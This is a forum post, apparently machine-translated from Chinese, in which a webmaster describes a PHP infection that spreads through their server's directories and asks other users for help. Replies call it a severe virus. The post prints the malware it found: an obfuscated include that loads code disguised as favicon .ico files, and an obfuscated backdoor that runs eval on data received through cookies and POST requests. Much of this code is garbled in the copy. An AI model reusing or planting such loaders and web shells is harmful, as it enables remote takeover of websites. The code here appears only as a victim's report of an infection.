The virus
Invasion of server 1. Once a web site will all sites under the server change, even change directory permissions,
2. Contains the following code will automatically generate the index. The PHP file, at the same time in various directory to generate favicon_ *. Ico file,
After decompiled code is a disguised as ico file,
<? PHP
/* f969b */
@ include "\ x6ct \ x2fs \ x65a \ x72c \ x68/\ x66a \ x76i \ x63o \ x6e_ \ x37f \ x652 \ x336 \ x2ei \ x63o";
/* f969b */


Ico file content is as follows:

<? PHP
if (! Defined (' ALREADY_RUN_1bc29b36f342a82aaf6658785356718))
{
Define (' ALREADY_RUN_1bc29b36f342a82aaf6658785356718 ', 1);

$lysoa=3298; The function yhdjugyza ($XCQTSZJ, $QBQXXJVSBM) {$egiafr=' '; for($i=0; $i $omlgrnwny="rawurl". "decode"; Return $omlgrnwny ($egiafr); }
='% $leqvta SU ASNiN_9CM Se Se SU % % % % % % 6 r % ec55p5_xpq 6 6 h % scb00 e % % SU BD f % % % S'.
6 r % expq_c55p59 ASNiN_9CM 'e % % % 6 e % % 6 h % ss ASNiN_9CM Se SU BD f % % % % % 6 r % ekw8_c8cl3mnpi_mnkc 6 6 h e % % %'.
'SS % 6 ASC55P5_5CoP5MNiQ Se SU BD f % % % % % 6 rs 6 Se SU BD f % % % % % AS9CM_MNkC_XNkNM % 6 rs % % f BD SU SU Se Se SU % % % % % % SeN7%6 r'.
6 vlc7nicl '% % 6 r % 66 ngn_ky0 SU 6 f % f % % % 66% Se Se SU ED % % % % % 6 s 6 s % 6 s %'.
'66 ngn_ky0 6 slc7nic % r % % 66% 6 h % s % 66% qHi 6 SU BD f % % % % 66% Se EU SeN7 SU SU Se % % % % % % 6 r'.
6 vlc7nicl '% % 6 r % 66 uzxkh1yxz_oknexe1yx SU 6 f % f % % % 66% Se Se SU ED % % % % 6 s % 6 s % % % 6 slc7nic 6 s'.
'6 r % 66 uzxkh1yxz_oknexe1yx % 66% 6 h % s % 66 BD/6 f % 66% % % SU SU Se Se SU EU % % % % % % SeN'.
'7% 6 s % 6 r % vlc7nicl % 6 r % ee0xkeuz_xbc_vaalrel7v6bpwr6ww7nvr5nw'.


3. Put the index. The HTML file is modified to index. The HTML. Bak. Bak files, at the same time generate index. The PHP file,
And in the index. In the PHP file with code to index. HTML. Bak. Bak files,

4. In some virus file name under the directory to generate similar documents,
Article19. PHP
Dirs25. PHP
Files94. PHP
Page30. PHP

The following part of the code
$jfwek='yvxr_o0943mfneiuHkd \' 5 - # s17b8t2c * lapg '; $mdcrdy=Array (); $mdcrdy []=$jfwek. [16] $jfwek [31]; $mdcrdy []=$jfwek [22]. $mdcrdy []=$jfwek. [24] $jfwek [27]. $jfwek [25]. $jfwek [7]. $jfwek [6]. $jfwek [29]. $jfwek [11]. $jfwek. [20] $jfwek [21]. $jfwek [9]. $jfwek [7]. $jfwek [18]. $jfwek [29]. $jfwek [21]. $jfwek [8]. $jfwek. [33] $jfwek [7]. $jfwek [30]. $jfwek [21]. $jfwek [7]. $jfwek [13]. $jfwek. [33] $jfwek [30]. $jfwek [21]. $jfwek [8]. $jfwek [18]. $jfwek. [24] $jfwek [30]. $jfwek [9]. $jfwek [13]. $jfwek [25]. $jfwek [11]. $jfwek [26]. $jfwek. [20] $jfwek. [24] $jfwek [33]. $mdcrdy []=$jfwek [30]. $jfwek [5]. $jfwek. [15] $jfwek [12]. $jfwek [28]. $mdcrdy []=$jfwek [23]. $jfwek [28]. $jfwek [3]. $jfwek [4]. $jfwek [3]. $jfwek [13]. $jfwek [34]. $jfwek [13]. $jfwek. [33] $jfwek [28]. $mdcrdy []=$jfwek [13]. $jfwek [2]. $jfwek [34]. $jfwek. [32] $jfwek [5]. $jfwek [18]. $jfwek [13]. $mdcrdy []=$jfwek [23]. $jfwek. [15] $jfwek [26]. $jfwek [23]. $jfwek [28]. $jfwek [3]. $mdcrdy []=$jfwek. [33] $jfwek [3]. $jfwek [3]. $jfwek. [33] $jfwek [0]. $jfwek [4]. $jfwek [10]. $jfwek [13]. $jfwek [3]. $jfwek [35]. $jfwek [13]. $mdcrdy []=$jfwek [23]. $jfwek [28]. $jfwek [3]. $jfwek. [32] $jfwek [13]. $jfwek [12]. $mdcrdy []=$jfwek [34]. $jfwek. [33] $jfwek [30]. $jfwek [17]. The foreach ($mdcrdy [7] ($_COOKIE, $_POST) as $eyynwg=& gt; {$qynibe) function bqjwgy ($mdcrdy, $eyynwg, $cavxuf) {return $mdcrdy [6] ($mdcrdy [4] ($eyynwg. $mdcrdy [2], [$cavxuf/$mdcrdy [8] ($eyynwg)) + 1), 0, $cavxuf); } function cicqtnb ($mdcrdy, $ubxwmgg) {return @ $mdcrdy [9] ($mdcrdy [0], $ubxwmgg); } function TLXHK ($mdcrdy, $ubxwmgg) {$BFVWKB=$mdcrdy [3] ($ubxwmgg) % 3. if (! {$BFVWKB) eval ($ubxwmgg [1] ($ubxwmgg [2])); exit(); }} $qynibe=cicqtnb ($mdcrdy, $qynibe); TLXHK ($mdcrdy, $mdcrdy [5] ($mdcrdy [1], $qynibe ^ bqjwgy ($mdcrdy, $eyynwg, $mdcrdy [8] ($qynibe)))); }


The above is my summary of some characteristics of may have not found,
Don't know the other webmasters don't have a similar situation in the BBS, manual clearly is beyond the limit of labor, as long as a file didn't deal with the second day still generates a large file virus, is beyond the my technical ability, hoped the warm-hearted friends help solve once, even to give directions,

CodePudding user response:

Severe virus,

CodePudding user response:

Companies have to crazy alarm

CodePudding user response:

Generally this is the website are hung horse, see if you didn't find you described can either be traversed web pages have been tampered with, looking for professional consultation